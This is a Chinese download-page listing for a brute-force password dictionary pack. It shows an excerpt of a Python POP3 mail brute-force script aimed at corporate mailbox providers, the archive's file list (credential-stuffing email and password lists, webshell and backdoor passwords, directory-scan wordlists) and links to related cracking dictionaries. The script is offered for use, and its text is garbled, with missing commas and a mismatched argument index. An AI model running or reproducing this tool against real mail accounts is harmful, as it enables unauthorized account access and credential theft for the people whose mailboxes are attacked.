资源简介
ssh爆破字典常用用户名密码字典
代码片段和文件信息
#!usr/bin/python
#!coding:utf-8
import threadingtimerandomsyspoplib
from copy import copy
if len(sys.argv) !=4:
print “\t Note: 邮箱类型为:‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘ \n“
print “\t Note: coremail|exchange 用户字典不需要域名后缀,例如zhangsan\n“
print “\t Note: 163|tencent|236 用户字典需要域名后缀,例如zhangsan@domain.com\n“
print “\t Usage: 163|tencent使用方法:./mail.py type \n“
print “\t Usage: 236|exchange|coremail使用方法:./mail.py type mail.domain.com\n“
sys.exit(1)
mailType=[‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘]
if sys.argv[1] in [‘236‘‘exchange‘‘coremail‘]:
try:
server = sys.argv[5]
except:
print ‘[-] Error: 236|exchange|coremail需要指定domain.com,请参考使用说明!\n‘
sys.exit(1)
elif sys.argv[1] == ‘163‘:
server = “pop.qiye.163.com“
elif sys.argv[1] == ‘tencent‘:
server = “pop.exmail.qq.com“
else :
print “[-] Error: 邮箱类型错误\n“
sys.exit(1)
success = []
try:
users_list = open(sys.argv[2] “r“)
users = users_list.readlines()
words_list = open(sys.argv[3] “r“)
words = words_list.readlines()
except(IOError):
print “[-] Error: 请检查用户名或密码路径及文件\n“
sys.exit(1)
finally:
users_list.close()
words_list.close()
try:
if sys.argv[1] in [‘163‘‘236‘]:
pop = poplib.POP3(server110)
else:
pop = poplib.POP3_SSL(server995)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = “[-] Error: No ResponseSomething wrong!!!\n“
sys.exit(1)
print “[+] Server:“server
print “[+] Users Loaded:“len(users)
print “[+] Words Loaded:“len(words)
print “[+] Server response:“welcome“\n“
def mailbruteforce(listuserlistpwdtype):
if len(listuser) < 1 or len(listpwd) < 1 :
print “[-] Error: An error occurred: No user or pass list\n“
return 1
for user in listuser:
for passwd in listpwd :
user = user.replace(“\n“““)
passwd = passwd.replace(“\n“““)
try:
print “-“*12
print “[+] User:“user“Password:“passwd
# time.sleep(0.1)
if type in [‘163‘‘236‘]:
popserver = poplib.POP3(server110)
else:
popserver = poplib.POP3_SSL(server995)
popserver.user(user)
auth = popserver.pass_(passwd)
print auth
if auth.split(‘ ‘)[0] == “+OK“ or auth ==“+OK“:
ret = (userpasswdpopserver.stat()[0]popserver.stat()[1])
success.append(ret)
#print len(success)
popserver.quit()
break
else :
popserver.quit()
co
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2019-02-26 10:28 Blasting_dictionary\
文件 2344 2017-11-15 15:30 Blasting_dictionary\3389爆破字典.txt
文件 3637 2017-11-15 15:30 Blasting_dictionary\baopo.py
文件 54 2017-11-15 15:30 Blasting_dictionary\big_dictionary.txt
文件 500 2017-11-15 15:30 Blasting_dictionary\jiahouzhui.py
文件 18284 2017-11-15 15:30 Blasting_dictionary\liunx_users_dictionaries.txt
文件 5176 2017-11-15 15:30 Blasting_dictionary\NT密码.txt
文件 8846 2017-11-15 15:30 Blasting_dictionary\renkoutop.txt
文件 1015 2017-11-15 15:30 Blasting_dictionary\top100password.txt
文件 9273839 2017-11-15 15:30 Blasting_dictionary\top10W.txt
文件 22534 2017-11-15 15:30 Blasting_dictionary\top500姓名组合.txt
文件 134 2017-11-15 15:30 Blasting_dictionary\weblogic默认密码列表.txt
文件 144194 2017-11-15 15:30 Blasting_dictionary\webshellPassword.txt
目录 0 2019-02-18 09:04 Blasting_dictionary\各类黑客大牛后门密码\
文件 12865 2017-11-15 15:30 Blasting_dictionary\各类黑客大牛后门密码\各类黑客大牛后门密码.txt
文件 40710 2017-11-15 15:30 Blasting_dictionary\后台路径.txt
文件 2107 2017-11-15 15:30 Blasting_dictionary\字典.txt
文件 62027 2017-11-15 15:30 Blasting_dictionary\常用密码.txt
文件 71357 2017-11-15 15:30 Blasting_dictionary\常用用户名.txt
目录 0 2019-02-18 09:04 Blasting_dictionary\撞库邮箱和密码\
文件 6683196 2017-11-15 15:30 Blasting_dictionary\撞库邮箱和密码\mail.txt
文件 3363897 2017-11-15 15:30 Blasting_dictionary\撞库邮箱和密码\passwd.txt
文件 10197 2017-11-15 15:30 Blasting_dictionary\数据库地址.txt
文件 174888 2017-11-15 15:30 Blasting_dictionary\渗透字典.txt
目录 0 2019-02-18 09:04 Blasting_dictionary\目录\
文件 40708 2017-11-15 15:30 Blasting_dictionary\目录\asp.txt
文件 18013 2017-11-15 15:30 Blasting_dictionary\目录\aspx.txt
文件 3081267 2017-11-15 15:30 Blasting_dictionary\目录\big_dict.txt
文件 129517 2017-11-15 15:30 Blasting_dictionary\目录\dic.txt
文件 1489 2017-11-15 15:30 Blasting_dictionary\目录\fck.txt
文件 13824 2017-11-15 15:30 Blasting_dictionary\目录\jsp.txt
............此处省略141个文件信息
相关资源
- 软件工程数据流图、数据字典、需求
- 180M弱口令字典
- 所有姓名(三个字以下)拼音字典
- zip破解字典
- 字典文本资源
- 1800多个弱口令字典1积分买不了吃亏买
- Ultraedit环境下配置verilog语法高亮的字
- 黑客密码字典,收集3年了。
- 超级弱口令暴力破解检查工具V1.0 Be
- 千万级暴力破解密码字典
- wifi跑包密码字典,跑包字典,暴力破
- ARCHPR-4.5.4压缩包密码破解器,字典
- 28g超大字典
- 百万常用暴力破解密码字典解压出来
- 暴力破解密码字典
- 密码字典.rar
- 超强密码字典.txt
- Nessus-8.6.0-x64.msi免费漏洞扫描软件
- Burp爆破Burp爆破 密码字典密码.zip
- 字典密码,20个文档密码
- 字典生成软件 beini 字典
- 身份证后六位。全国弱口令top1000常见
- 非齐次非线性Schrodinger方程爆破解的
- wifi字典完美
- 15万自收藏暴力破解字典
- perl语言:成语词典进行加工,生成一
- 中国姓名TOP500字典
- 爆破常用密码字典100-1000000
- 2019常用爆破字典+字典生产工具.rar
- 常用用户名 密码 用户名字典 密码字
评论
共有 条评论